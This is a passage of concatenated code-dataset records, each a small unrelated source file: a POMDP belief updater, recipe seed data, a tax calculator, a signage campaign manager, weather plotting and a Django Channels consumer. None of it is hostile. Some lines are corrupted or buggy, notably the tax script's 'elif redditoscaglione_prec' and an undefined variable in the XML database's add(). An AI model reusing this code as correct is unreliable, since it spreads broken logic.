deleted.\")\n","sub_path":"examples/server_profile_templates.py","file_name":"server_profile_templates.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"606971816","text":"from collections import defaultdict\nfrom simple_rl.planning.ValueIterationClass import ValueIteration\n\nimport pdb\n\nclass BeliefUpdater(object):\n ''' Wrapper class for different methods for belief state updates in POMDPs. '''\n\n def __init__(self, mdp, transition_func, reward_func, observation_func, updater_type='discrete', observation_prob_func= None, transition_prob_func = None):\n '''\n Args:\n mdp (POMDP)\n transition_func: T(s, a) --> s'\n reward_func: R(s, a) --> float\n observation_func: O(s) --> z\n updater_type (str)\n observation_prob_func: O(o,s,a) --> Prob(o | s,a)\n '''\n self.reward_func = reward_func\n self.updater_type = updater_type\n\n # We use the ValueIteration class to construct the transition and observation probabilities\n self.vi = ValueIteration(mdp, sample_rate=500)\n\n self.transition_probs = self.construct_transition_matrix(transition_func)\n self.observation_probs = self.construct_observation_matrix(observation_func)\n #\n self.observation_probs_func = observation_prob_func\n if updater_type == 'discrete':\n self.updater = self.discrete_filter_updater\n elif updater_type == 'kalman':\n self.updater = self.kalman_filter_updater\n elif updater_type == 'particle':\n self.updater = self.particle_filter_updater\n else:\n raise AttributeError('updater_type {} did not conform to expected type'.format(updater_type))\n\n def discrete_filter_updater(self, belief, action, observation):\n def _compute_normalization_factor(bel):\n return sum(bel.values())\n\n def _update_belief_for_state(b, sp, T, O, a, z):\n return O[sp][a][z] * sum([T[s][a][sp] * b[s] for s in b])\n\n new_belief = defaultdict()\n for sprime in belief:\n new_belief[sprime] = _update_belief_for_state(belief, sprime, self.transition_probs, self.observation_probs, action, observation)\n\n normalization = _compute_normalization_factor(new_belief)\n\n for sprime in belief:\n if normalization > 0: new_belief[sprime] /= normalization\n\n return new_belief\n # def flat_discrete_belief_updater(self, belief, action, observation):\n # observation_probs = [self.observation_probs_func(observation, )]\n\n\n def discrete_filter_updater_Fetch(self, belief, action, observation):\n observation_probs = [self.observation_prob_func(observation, {\"desired_item\": i, \"last_referenced_item\": belief[0]}) for i in\n range(len(belief[1]))]\n def kalman_filter_updater(self, belief, action, observation):\n pass\n\n def particle_filter_updater(self, belief, action, observation):\n pass\n\n def construct_transition_matrix(self, transition_func):\n '''\n Create an MLE of the transition probabilities by sampling from the transition_func\n multiple times.\n Args:\n transition_func: T(s, a) -> s'\n\n Returns:\n transition_probabilities (defaultdict): T(s, a, s') --> float\n '''\n self.vi._compute_matrix_from_trans_func()\n return self.vi.trans_dict\n\n def construct_observation_matrix(self, observation_func):\n '''\n Create an MLE of the observation probabilities by sampling from the observation_probability_func\n multiple times.\n Args:\n observation_func: O(s) -> z\n\n Returns:\n observation_probabilities (defaultdict): O(s, a, z) --> float\n '''\n obs_dict = defaultdict(lambda:defaultdict(lambda:defaultdict(float)))\n for state in self.vi.get_states():\n for action in self.vi.mdp.actions:\n for sample in range(self.vi.sample_rate):\n observation = observation_func(state, action)\n obs_dict[state][action][observation] += 1. / self.vi.sample_rate\n return obs_dict","sub_path":"zips/simple_rl-FetchPOMDP/simple_rl/pomdp/BeliefUpdaterClass.py","file_name":"BeliefUpdaterClass.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274299101","text":"from app.models import db, RecipeIngredient\n\n\n# Adds a demo user, you can add other users here if you want\ndef seed_recipe_ingredients():\n tofu = RecipeIngredient(\n ingredient='Tofu (Extra Firm)', measurement='400 grams', recipe_id=1)\n cornflour_for_tofu = RecipeIngredient(\n ingredient='Cornflour (For Tofu)', measurement='2 tablespoons', recipe_id=1)\n salt = RecipeIngredient(\n ingredient='Salt', measurement='1/2 teaspoon', recipe_id=1)\n pepper = RecipeIngredient(\n ingredient='Pepper (Ground)', measurement='1/4 teaspoon', recipe_id=1)\n vegetable_oil_for_tofu = RecipeIngredient(\n ingredient='Vegetable Oil (For Tofu)', measurement='1 1/2 tablespoon', recipe_id=1)\n soy_sauce = RecipeIngredient(\n ingredient='Soy Sauce', measurement='1/4 cup', recipe_id=1)\n hoisin_sauce = RecipeIngredient(\n ingredient='Hoisin Sauce', measurement='2 teaspoons', recipe_id=1)\n rice_vinegar = RecipeIngredient(\n ingredient='Rice Vinegar', measurement='2 teaspoons', recipe_id=1)\n sesame_oil = RecipeIngredient(\n ingredient='Toasted Sesame Oil', measurement='1 tablespoon', recipe_id=1)\n chili_flakes = RecipeIngredient(\n ingredient='Chili Flakes', measurement='1 teaspoon', recipe_id=1)\n cornflour_for_sauce = RecipeIngredient(\n ingredient='Cornflour (For Sauce)', measurement='1 tablespoon', recipe_id=1)\n water = RecipeIngredient(\n ingredient='Water', measurement='1/4 cup', recipe_id=1)\n vegetable_oil_for_stirfry = RecipeIngredient(\n ingredient='Vegetable Oil (For Stir Fry)', measurement='1 tablespoon', recipe_id=1)\n garlic = RecipeIngredient(\n ingredient='Garlic (Finely Chopped)', measurement='4 cloves', recipe_id=1)\n ginger = RecipeIngredient(\n ingredient='Ginger (Peeled, Finely Chopped)', measurement='1 inch', recipe_id=1)\n broccoli = RecipeIngredient(\n ingredient='Broccoli Florets', measurement='1 whole head', recipe_id=1)\n sesame_seeds = RecipeIngredient(\n ingredient='Toasted Sesame Seeds', recipe_id=1)\n green_onion = RecipeIngredient(\n ingredient='Green Onion (Chopped)', recipe_id=1)\n cooked_broccoli = RecipeIngredient(\n ingredient='Broccoli (Cooked)', measurement='2 cups', recipe_id=2)\n raw_cauliflower = RecipeIngredient(\n ingredient='Cauliflower', measurement='1 head', recipe_id=2)\n coconut_oil = RecipeIngredient(\n ingredient='Coconut Oil', measurement='1 tablespoon', recipe_id=2)\n brown_rice = RecipeIngredient(\n ingredient='Brown Rice (Cooked)', measurement='3 cups', recipe_id=2)\n garlic_vegie_fried_rice = RecipeIngredient(\n ingredient='Garlic (Finely Chopped)', measurement='5 cloves', recipe_id=2)\n soy_sauce_vegie_fried_rice = RecipeIngredient(\n ingredient='Soy Sauce', measurement='3 tablespoons', recipe_id=2)\n frozen_peas = RecipeIngredient(\n ingredient='Frozen Peas', measurement='1 cup', recipe_id=2)\n scallion = RecipeIngredient(\n ingredient='Scallions', measurement='8 chopped', recipe_id=2)\n sesame_oil_vegie_fried_rice = RecipeIngredient(\n ingredient='Sesame Oil', measurement='2 teaspoons', recipe_id=2)\n sesame_seeds_vegie_fried_rice = RecipeIngredient(\n ingredient='Sesame Seeds', recipe_id=2)\n basil = RecipeIngredient(\n ingredient='Basil', measurement='1/4 cup', recipe_id=3)\n flour = RecipeIngredient(\n ingredient='Flour', measurement='1 cup', recipe_id=3)\n garlic_powder = RecipeIngredient(\n ingredient='Garlic Powder', measurement='1/4 teaspoon', recipe_id=3)\n garlic_salt = RecipeIngredient(\n ingredient='Garlic Salt', measurement='pinch', recipe_id=3)\n potatoes = RecipeIngredient(\n ingredient='Potatoes', measurement='4 whole', recipe_id=3)\n vegetable_oil_garlic_fries = RecipeIngredient(\n ingredient='Vegetable Oil', measurement='splash', recipe_id=3)\n banana = RecipeIngredient(\n ingredient='Banana', measurement='1/4 cup', recipe_id=4)\n graham_cracker_crumbs = RecipeIngredient(\n ingredient='Graham Cracker Crumbs', measurement='2 tablespoons', recipe_id=4)\n soy_milk = RecipeIngredient(\n ingredient='Soy Milk', measurement='1 cup', recipe_id=4)\n strawberry = RecipeIngredient(\n ingredient='Strawberry', measurement='1/2 cup', recipe_id=4)\n vanilla_yogurt = RecipeIngredient(\n ingredient='vanilla_yogurt', measurement='splash', recipe_id=4)\n balsamic_vinegar = RecipeIngredient(\n ingredient='Balsalmic Vinegar', measurement='3 tablespoons', recipe_id=5)\n garlic_garlicky_kale = RecipeIngredient(\n ingredient='Garlic', measurement='1 clove', recipe_id=5)\n kale = RecipeIngredient(\n ingredient='Kale', measurement='1 bunch', recipe_id=5)\n olive_oil = RecipeIngredient(\n ingredient='Olive_oil', measurement='splash', recipe_id=5)\n brown_rice_jumbalaya = RecipeIngredient(\n ingredient='Brown Rice (Cooked and Dried)', measurement='2 cups', recipe_id=6)\n carrots = RecipeIngredient(\n ingredient='Carrots', measurement='2 medium', recipe_id=6)\n celery = RecipeIngredient(\n ingredient='Celery', measurement='2 stalks', recipe_id=6)\n celery_seed = RecipeIngredient(\n ingredient='Celery Seeds', measurement='1 teaspoon', recipe_id=6)\n kidney_beans = RecipeIngredient(\n ingredient='Kidney Beans (Cooked and Dried)', measurement='2 cups', recipe_id=6)\n marjoram = RecipeIngredient(\n ingredient='Marjoram (Dried)', measurement='1 teaspoon', recipe_id=6)\n thyme = RecipeIngredient(\n ingredient='Thyme (Dried)', measurement='2 teaspoons', recipe_id=6)\n eggplant = RecipeIngredient(\n ingredient='Eggplant', measurement='1 medium', recipe_id=6)\n garlic_jumbalaya = RecipeIngredient(\n ingredient='Garlic', measurement='1/5 clove', recipe_id=6)\n green_beans = RecipeIngredient(\n ingredient='Green Beans', measurement='3 handfuls', recipe_id=6)\n black_pepper = RecipeIngredient(\n ingredient='Black Pepper (Fresh Ground)', measurement='pinch', recipe_id=6)\n sage = RecipeIngredient(\n ingredient='Sage (Ground)', measurement='2 teaspoons', recipe_id=6)\n liquid_smoke = RecipeIngredient(\n ingredient='Liquid Smoke', measurement='1/2 teaspoon', recipe_id=6)\n olive_oil_jumbalaya = RecipeIngredient(\n ingredient='Olive Oil', measurement='2 tablespoons', recipe_id=6)\n red_bell_pepper = RecipeIngredient(\n ingredient='Red Bell Pepper', measurement='1 medium', recipe_id=6)\n red_onion = RecipeIngredient(\n ingredient='Red Onion (Diced)', measurement='1 small', recipe_id=6)\n sea_salt = RecipeIngredient(\n ingredient='Sea Salt', measurement='1 1/2 tablespoons', recipe_id=6)\n siracha = RecipeIngredient(\n ingredient='Siracha', measurement='1 teaspoon', recipe_id=6)\n tomatoes = RecipeIngredient(\n ingredient='Tomatoes (Diced)', measurement='2 medium', recipe_id=6)\n vegetable_stock = RecipeIngredient(\n ingredient='Vegetable Stock', measurement='3 cups', recipe_id=6)\n \n \n\n db.session.add(tofu)\n db.session.add(cornflour_for_tofu)\n db.session.add(salt)\n db.session.add(pepper)\n db.session.add(vegetable_oil_for_tofu)\n db.session.add(soy_sauce)\n db.session.add(hoisin_sauce)\n db.session.add(rice_vinegar)\n db.session.add(sesame_oil)\n db.session.add(chili_flakes)\n db.session.add(cornflour_for_sauce)\n db.session.add(water)\n db.session.add(vegetable_oil_for_stirfry)\n db.session.add(garlic)\n db.session.add(ginger)\n db.session.add(broccoli)\n db.session.add(sesame_seeds)\n db.session.add(green_onion)\n db.session.add(cooked_broccoli)\n db.session.add(raw_cauliflower)\n db.session.add(coconut_oil)\n db.session.add(brown_rice)\n db.session.add(garlic_vegie_fried_rice)\n db.session.add(soy_sauce_vegie_fried_rice)\n db.session.add(frozen_peas)\n db.session.add(scallion)\n db.session.add(sesame_oil_vegie_fried_rice)\n db.session.add(sesame_seeds_vegie_fried_rice)\n db.session.add(basil)\n db.session.add(flour)\n db.session.add(garlic_powder)\n db.session.add(garlic_salt)\n db.session.add(potatoes)\n db.session.add(vegetable_oil_garlic_fries)\n db.session.add(banana)\n db.session.add(graham_cracker_crumbs)\n db.session.add(soy_milk)\n db.session.add(strawberry)\n db.session.add(vanilla_yogurt)\n db.session.add(balsamic_vinegar)\n db.session.add(garlic_garlicky_kale)\n db.session.add(kale)\n db.session.add(olive_oil)\n db.session.add(brown_rice_jumbalaya)\n db.session.add(carrots)\n db.session.add(celery)\n db.session.add(celery_seed)\n db.session.add(kidney_beans)\n db.session.add(marjoram)\n db.session.add(thyme)\n db.session.add(eggplant)\n db.session.add(garlic_jumbalaya)\n db.session.add(green_beans)\n db.session.add(black_pepper)\n db.session.add(sage)\n db.session.add(liquid_smoke)\n db.session.add(olive_oil_jumbalaya)\n db.session.add(red_bell_pepper)\n db.session.add(red_onion)\n db.session.add(sea_salt)\n db.session.add(siracha)\n db.session.add(tomatoes)\n db.session.add(vegetable_stock)\n \n\n db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE the users table.\n# SQLAlchemy doesn't have a built in function to do this\n# TRUNCATE Removes all the data from the table, and RESET IDENTITY\n# resets the auto incrementing primary key, CASCADE deletes any\n# dependent entities\ndef undo_recipe_ingredients():\n db.session.execute('TRUNCATE recipe_ingredients RESTART IDENTITY CASCADE;')\n db.session.commit()\n","sub_path":"app/seeds/recipe_ingredients.py","file_name":"recipe_ingredients.py","file_ext":"py","file_size_in_byte":9643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479969106","text":"#!/usr/bin/env python\r\n# coding=utf8\r\n\r\nimport re\r\n\r\nmy_file = '/root/ls.tmp'\r\nhostConfigRe = r'^\\s*' + 'ssli' + '\\s*.*$'\r\npattern = re.compile(hostConfigRe)\r\n\r\nwith open(my_file) as f:\r\n lines = f.readlines()\r\n\r\nwith open(my_file, 'w') as f:\r\n for line in lines:\r\n result = pattern.match(line.lower())\r\n if result is None:\r\n f.write(line)\r\n else:\r\n f.write(line.replace(line, '# ' + line))\r\n","sub_path":"demo/replace_file_str.py","file_name":"replace_file_str.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197866767","text":"diz = {15000 : 23,\n28000 : 27,\n55000 : 38,\n75000 : 41,\n1000000000000 : 43}\n\nreddito = int(input(\"Inserisci il reddito in euro: \"))\n\nimposta=0\nscaglione_prec = 0\nfor scaglione in diz:\n importo_da_tassare=0\n if reddito>=scaglione:\n importo_da_tassare = scaglione-scaglione_prec\n elif redditoscaglione_prec:\n importo_da_tassare = reddito - scaglione_prec\n else:\n break\n \n imposta += importo_da_tassare * diz[scaglione] / 100\n scaglione_prec = scaglione\n\nprint(\"L'imposta totale è di euro: \", round(imposta,3))\ntax = imposta * 100 / reddito\nprint(\"La tassazione media applicata è: \", round(tax,2), \"%\")\n\n","sub_path":"es_29_pag_190.py","file_name":"es_29_pag_190.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"276906831","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-i386/egg/golem/db/fs.py\n# Compiled at: 2008-08-22 15:02:55\nimport sys, os, shutil, golem\nfrom lxml import etree\nimport md5\n\nclass xmldb(object):\n __module__ = __name__\n\n def __init__(self, path):\n \"\"\"open-or-create xml collection\n\nin the flatfile context, that corresponds to a directory, doesn't it...\n- so all we do is store the file in the directory.\n \"\"\"\n self.files = [ x for x in os.listdir(path) if x.endswith('.xml') ]\n self.dir = path\n\n def add(self, *filenames):\n \"\"\" add files to database - which just means copy to directory.\"\"\"\n for file in filenames:\n shutil.copy(f, self.dir)\n\n def qfile(self, filename, conceptlist, single=False):\n tree = etree.parse(filename)\n xpath = golem.helpers.xpath.xpath(conceptlist)\n res = []\n for x in xpath:\n res.extend(tree.xpath(x, conceptlist[(-1)].parentdictionary.namespaces))\n\n if single:\n if len(res) != 1:\n raise AssertionError('Insufficiently specific search set - multiple instances returned.\\n')\n del tree\n return res\n\n def query(self, *conceptsets):\n evaluators = [ x[(-1)] for x in conceptsets ]\n rawres = []\n for fn in self.files:\n f = os.path.join(self.dir, fn)\n rawres.append(golem.db.resultlist([], filename=f))\n for conceptlist in conceptsets:\n rawres[(-1)].extend(self.qfile(f, conceptlist, single=True))\n\n results = []\n for rawrow in rawres:\n row = golem.db.resultlist([], filename=rawrow.filename)\n for idx in range(len(rawrow)):\n ev = evaluators[idx]\n row.append(ev.getvalue(rawrow[idx]))\n\n results.append(row)\n\n return results\n\n def query_cached(self, cache, *conceptsets):\n evaluators = [ x[(-1)] for x in conceptsets ]\n res = []\n for fn in self.files:\n f = os.path.join(self.dir, fn)\n row = golem.db.resultlist([], filename=f)\n res.append(row)\n md5sum = md5.md5(open(f, 'r').read()).hexdigest()\n if f in cache and md5sum in cache[f]:\n for idx in range(len(conceptsets)):\n conceptlist = conceptsets[idx]\n clkey = ('').join([ c.id for c in conceptlist ])\n ev = evaluators[idx]\n if clkey in cache[f][md5sum]:\n row.append(cache[f][md5sum][clkey])\n else:\n xv = self.qfile(f, conceptlist, single=True)\n assert len(xv) == 1\n val = ev.getvalue(xv[0])\n row.append(val)\n cache[f][md5sum][clkey] = val\n\n else:\n cache[f] = {}\n cache[f][md5sum] = {}\n for idx in range(len(conceptsets)):\n conceptlist = conceptsets[idx]\n clkey = ('').join([ c.id for c in conceptlist ])\n ev = evaluators[idx]\n xv = self.qfile(f, conceptlist, single=True)\n assert len(xv) == 1\n val = ev.getvalue(xv[0])\n row.append(val)\n cache[f][md5sum][clkey] = val\n\n return res\n\n\nif __name__ == '__main__':\n pass","sub_path":"pycfiles/golem-1.01-py2.4/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"24926487","text":"import json\nimport logging\nfrom manager import Manager\nimport datetime\n\nlog = logging.getLogger(\"uk.co.tomsl-LinuxDigitalSignageClient | campaign_manager.py\")\n\nclass CampaignManager(Manager):\n \"\"\"Manages loading and validating campaigns.\n\n Attributes:\n campaign_directory (str): The directory in which campaigns are stored.\n campaigns (:obj:`list` of :obj:`Campaign`): A list of Campaign objects loaded from campaign files.\n playlist_manager (:obj:`PlaylistManager`): A reference to the Playlist Manager holding playlist data.\n\n \"\"\"\n\n def __init__(self, campaign_directory, playlist_manager):\n \"\"\"Initialise Campaign Manager.\n\n Args:\n campaign_directory (str): Path to campaigns directory (relative to \n wherever this file was run from).\n playlist_manager (:obj:`PlaylistManager`): A reference to the Playlist Manager holding playlist data.\n \n \"\"\"\n log.info(\"Starting campaign manager\")\n self.campaign_directory = campaign_directory\n self.campaigns = None\n self.playlist_manager = playlist_manager\n\n def scan_campaign_directory(self):\n \"\"\"Should be used by any other objects to start loading campaigns.\"\"\"\n log.info(\"Scanning campaign directory\")\n\n # Call load_all_campaigns to load campaigns from file.\n self.load_all_campaigns()\n\n log.info(\"Found \" + str(len(self.campaigns)) + \" campaigns\")\n\n def load_all_campaigns(self):\n \"\"\"Loads all campaigns from the campaigns directory.\"\"\"\n self.campaigns = []\n\n # Scan campaigns directory for files.\n campaigns = self.scan_directory(self.campaign_directory)\n\n # Store whether a campaign called 'Main' has been found.\n main_found = False\n\n for campaign in campaigns:\n\n # Check that campaign file ends in .json\n if campaign.endswith('.json'):\n # Load data from file in a dictionary.\n data = []\n with open(campaign) as f:\n data = json.load(f)\n data = dict(data)\n\n # Create a Campaign object and populate with data from file.\n campaign_obj = Campaign(self.playlist_manager)\n if data.__contains__('name'):\n campaign_obj.name = data['name']\n if data.__contains__('startTime'):\n campaign_obj.set_start_time(data['startTime'])\n if data.__contains__('endTime'):\n campaign_obj.set_end_time(data['endTime'])\n if data.__contains__('playlistOrder'):\n campaign_obj.set_playlist_order(data['playlistOrder'])\n\n # Check that the campaign is valid.\n if self.validate_campaign(campaign_obj):\n self.campaigns.append(campaign_obj)\n\n # Check whether we've found the Main campaign.\n if campaign_obj.name == \"Main\":\n main_found = True\n \n # If we've not found a valid Main campaign, error.\n if not main_found:\n print(\"Error\")\n\n def validate_campaign(self, campaign):\n \"\"\"Checks whether a campaign is valid.\n \n Args:\n campaign (:obj:`Campaign`): The campaign object to validate.\n\n Returns:\n True if the campaign is valid, False otherwise.\n \n \"\"\"\n # Main campaign does not have a start/end time and must contain at least one item.\n if campaign.name == \"Main\":\n if campaign.start_time != -1:\n return False\n if campaign.end_time != -1:\n return False\n if len(campaign.playlist_order) < 1:\n return False\n return True\n else:\n # Campaign must use the same type of time for start/end.\n if campaign.start_time_type != campaign.end_time_type:\n return False\n # End time must be later than start time.\n if campaign.start_time >= campaign.end_time:\n return False\n # Campaign must contain at least one item.\n if len(campaign.playlist_order) < 1:\n return False\n return True\n\nclass Campaign:\n \"\"\"Stores information about an individual campaign.\n\n Attributes:\n name (str): Campaign name, assumed to be unique.\n start_time (:obj:`DateTime`): Start time of the campaign.\n start_time_type (str): Type of start time, either \"MAIN\", \"RELATIVE\" or \"EXACT\".\n end_time (:obj:`DateTime`): End time of the campaign.\n end_time_type (str): Type of end time, either \"MAIN\", \"RELATIVE\" or \"EXACT\".\n playlist_order (:obj:`list` of :obj:`Playlist`): Playlists belonging to this campaign, in order of play.\n playlist_manager (:obj:`PlaylistManager`): Reference to the playlist manager containing loaded playlists.\n\n \"\"\"\n\n def __init__(self, playlist_manager):\n \"\"\"Initialise Campaign.\n \n Args:\n playlist_manager (:obj:`PlaylistManager`): Reference to a playlist manager.\n \"\"\"\n self.name = None\n self.start_time = None\n self.start_time_type = None\n self.end_time = None\n self.end_time_type = None\n self.playlist_order = None\n self.playlist_manager = playlist_manager\n\n def set_start_time(self, time):\n \"\"\"Sets the start time and type of the campaign.\n\n Args:\n time (str): Time written either as 24 hour time (0123) or UNIX timestamp (or -1).\n\n \"\"\"\n\n ret_time = self.get_time_object(time)\n self.start_time = ret_time[0]\n self.start_time_type = ret_time[1]\n\n def set_end_time(self, time):\n \"\"\"Sets the end time and type of the campaign.\n\n Args:\n time (str): Time written either as 24 hour time (0123) or UNIX timestamp (or -1).\n\n \"\"\"\n\n ret_time = self.get_time_object(time)\n self.end_time = ret_time[0]\n self.end_time_type = ret_time[1]\n\n def set_playlist_order(self, order):\n \"\"\"Sets the order of playlists to play.\n\n Args:\n order (:obj:`list` of str): List of playlist names.\n\n \"\"\"\n\n self.playlist_order = []\n for lst in order:\n # Validates that playlist exists\n if self.playlist_manager.playlist_exists(lst):\n self.playlist_order.append(lst)\n\n def get_time_object(self, time):\n \"\"\"Convert a time string to a time object.\n\n Args:\n time (str): Time as either 24 hour time (0123), UNIX timestamp or -1\n\n Returns:\n list containing translated time and time type. Translated time is: -1 if time == -1, otherwise a DateTime object.\n\n \"\"\"\n\n if not (len(time) >= 4):\n if time == \"-1\":\n return [-1, \"MAIN\"]\n else:\n print(\"Error\")\n else:\n if len(time) == 4:\n return [datetime.time(int(time[:2]), int(time[3:]), 0, 0), \"RELATIVE\"]\n else:\n return [datetime.datetime.utcfromtimestamp(int(time)), \"EXACT\"]","sub_path":"src/campaign_manager.py","file_name":"campaign_manager.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76251540","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 11 22:24:33 2017\n\n@author: Pulkit\n\"\"\"\n\n#imports\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt, pylab as ply\nplt.style.use('ggplot')\n\n\nfile_name='NOAAData.csv' # file to work with\n\ndf_wd = pd.read_csv(file_name)\n\ndf_wd['Month_Date'] = df_wd['Date'].apply(lambda x : x[-5:]) #creating new column from Date\n\n'''Removing 29 feb, filtering out dates for year 2015, selecting Element as TMIN, grouping on Month_Date and agg min\n value per day.'''\n\n\ndf_wd_min = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) < '2015-01-01') &\n (df_wd['Element']=='TMIN')].groupby('Month_Date').agg({'Data_Value':np.min})\n\n\n'''Removing 29 feb, filtering out dates for year 2015, selecting Element as TMAX, grouping on Month_Date and agg max\n value per day.'''\n\ndf_wd_max = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) < '2015-01-01') &\n (df_wd['Element']=='TMAX')].groupby('Month_Date').agg({'Data_Value':np.max})\n\n\n\n'''Removing 29 feb, extracting dates for year 2015, selecting Element as TMIN, grouping on Month_Date and agg min\n value per day.'''\n\ndf_2015_min = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) > '2014-12-31') &\n (df_wd['Element']=='TMIN')].groupby('Month_Date').agg({'Data_Value':np.min})\n\n\n\n'''Removing 29 feb, extracting dates for year 2015, selecting Element as TMAX, grouping on Month_Date and agg max\n value per day.'''\n\ndf_2015_max = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) > '2014-12-31') &\n (df_wd['Element']=='TMAX')].groupby('Month_Date').agg({'Data_Value':np.max})\n\n\n'''Finding index of the days in year 2015 where min temprature is less than years 2005-2014 and max temprature\n is greater than years 2005-2014'''\nmin_break,max_break = zip( *zip(np.where(df_2015_min['Data_Value'] < df_wd_min['Data_Value']) , \n np.where(df_2015_max['Data_Value'] > df_wd_max['Data_Value'])))\n\n\n# to be used as xtick labels\nmonth_list = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\n\nplt.figure(figsize=(10,4)) #creating the canvas \nplt.plot(df_wd_min.values/10, label = 'low',color='blue') #plotting min values for the years 2005-2014\nplt.plot(df_wd_max.values/10,color='red', label = 'high') #plotting max values for the years 2005-2014 \n\n#scatter plots of points where the record of max and min tempratures were broken in the year 2015\nplt.scatter(min_break,df_2015_min.iloc[min_break]/10,s=20,c = 'm', label = 'min_break') \nplt.scatter(max_break,df_2015_max.iloc[max_break]/10,s=20,c = 'g', label = 'max_break')\n\nplt.title('Month Wise Temprature Summary from 2005-2015') #plot title\nplt.xlabel('Months') #xlabel(x-axis label)\nplt.ylabel('Temprature (Degree C)') #ylabel(y-axis label)\nplt.xticks(range(0,len(df_wd_max.index),33), month_list) #allocating xticks and xticklabels\n\nplt.legend() #adding legend\nplt.grid() #removing grid lines\n\n#filling the gap between min and max values\nplt.gca().fill_between(range(len(df_wd_max)),df_wd_max['Data_Value']/10,df_wd_min['Data_Value']/10,facecolor='blue',alpha=0.25 )\nply.savefig('MonthlyTemperatureSummary2005-2015.png', bbox_inches='tight') #save plot to png file\nplt.show() #show the plot\n\n\n","sub_path":"PlottingWeatherData/PlottingWeatherData.py","file_name":"PlottingWeatherData.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322024705","text":"\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nimport json\nfrom channels.db import database_sync_to_async\nfrom core.models import Room\n\n\n\n@database_sync_to_async\ndef room_user_left(room_id,player_num):\n try:\n room = Room.objects.get(pk=room_id)\n if room.player1_profile==player_num and not room.player1_left:\n # print(\"user left 1\")\n room.player1_score=-1\n room.player1_left=True\n room.save()\n elif room.player2_profile==player_num and not room.player2_left:\n # print(\"user left 2\")\n room.player2_score=-1\n room.player2_left=True\n room.save()\n room.save()\n return room\n except Room.DoesNotExist:\n pass\n\n@database_sync_to_async\ndef get_room(room_id):\n try:\n room = Room.objects.get(pk=room_id)\n \n return room\n except Room.DoesNotExist:\n return None\n\n\nclass RoomConsumer(AsyncWebsocketConsumer):\n\n player1=0\n player2=0\n is_random=False\n\n async def connect(self):\n\n if self.scope['user'].is_authenticated:\n # print(\"Accept\")\n # Accept the connection\n await self.accept()\n \n else:\n # Reject the connection\n # print(\"is_anonymous\")\n await self.close()\n \n self.sender=0\n self.qustion_num=0\n self.room_id = self.scope['url_route']['kwargs']['pk']\n self.group_name = \"{}\".format(self.room_id)\n # Join room group\n\n\n await self.channel_layer.group_add(\n self.group_name,\n self.channel_name\n )\n\n\n async def disconnect(self, close_code):\n\n player1score=0\n player2score=0\n room=await get_room(self.room_id)\n\n if room and not room.take_prize and not room.is_random:\n \n if self.scope['user'].pk == self.player1:\n # print(\"user 1\")\n player1score=-1\n self.sender=self.player1\n\n elif self.scope['user'].pk == self.player2:\n # print(\"user 2\")\n player2score=-1\n self.sender=self.player2\n \n\n await self.channel_layer.group_send(\n self.group_name,\n {\n 'type': 'recieve_group_message',\n 'player1score':player1score,\n 'player2score':player2score,\n 'sender':self.sender,\n 'question':self.qustion_num,\n }\n )\n\n await self.channel_layer.group_discard(\n self.group_name,\n self.channel_name\n )\n \n\n\n async def receive(self, text_data=None,bytes_data = None):\n\n text_data_json = json.loads(text_data)\n\n player1score = text_data_json['player1score']\n player2score = text_data_json['player2score']\n sender = text_data_json['sender']\n question= text_data_json['question']\n \n self.qustion_num=question\n self.sender=sender\n \n \n if self.player1==0:\n room =await get_room(self.room_id)\n self.player1=room.player1_profile\n \n if self.player2==0 :\n room =await get_room(self.room_id)\n self.player2=room.player2_profile\n \n \n\n await self.channel_layer.group_send(\n self.group_name,\n {\n 'type': 'recieve_group_message',\n 'player1score':player1score,\n 'player2score':player2score,\n 'sender':sender,\n 'question':question,\n }\n )\n\n if player1score==-1 :\n \n await room_user_left(self.room_id,self.scope['user'].pk)\n \n elif player2score==-1:\n \n await room_user_left(self.room_id,self.scope['user'].pk)\n\n # call_command('random_player',self.room_id)\n \n\n\n async def recieve_group_message(self, event):\n\n player1score = event['player1score']\n player2score = event['player2score']\n sender = event['sender']\n question =event['question']\n\n if player1score==-1 and player2score==0:\n\n await self.send(\n text_data=json.dumps({\n 'player1score':player1score,\n 'player2score':player2score,\n 'sender':sender,\n 'question':question,\n }))\n elif player2score==-1 and player1score==0:\n\n await self.send(\n text_data=json.dumps({\n 'player1score':player1score,\n 'player2score':player2score,\n 'sender':sender,\n 'question':question,\n }))\n\n await self.send(\n text_data=json.dumps({\n 'player1score':player1score,\n 'player2score':player2score,\n 'sender':sender,\n 'question':question,\n 